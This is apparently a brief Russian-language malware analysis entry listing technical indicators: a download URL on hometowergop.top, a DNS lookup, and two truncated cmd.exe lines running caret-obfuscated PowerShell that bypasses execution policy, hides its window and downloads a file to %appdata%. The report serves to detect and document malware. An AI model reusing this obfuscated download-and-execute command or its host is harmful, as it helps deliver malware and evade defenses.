Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWers^HELL.^E^XE -e^X^e^C^uTioNP^OLiCY^ BYP^A^sS^ -nOPRoFIL^E -^WIN^D^o^W^sTyLe^ H^IdDen ^(^ne^w-^o^BJe^C^t ^sYsT^e^M.^N^ET.^wE^B^cLIeNt^)^.doWnl^O^aDf^Ile('http://hometow...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "PoWers^HELL.^E^XE -e^X^e^C^uTioNP^OLiCY^ BYP^A^sS^ -nOPRoFIL^E -^WIN^D^o^W^sTyLe^ H^IdDen ^(^ne^w-^o^BJe^C^t ^sYsT^e^M.^N^ET.^wE^B^cLIeNt^)^.doWnl^O^aDf^Ile('http://hometow...' (со скрытым окном)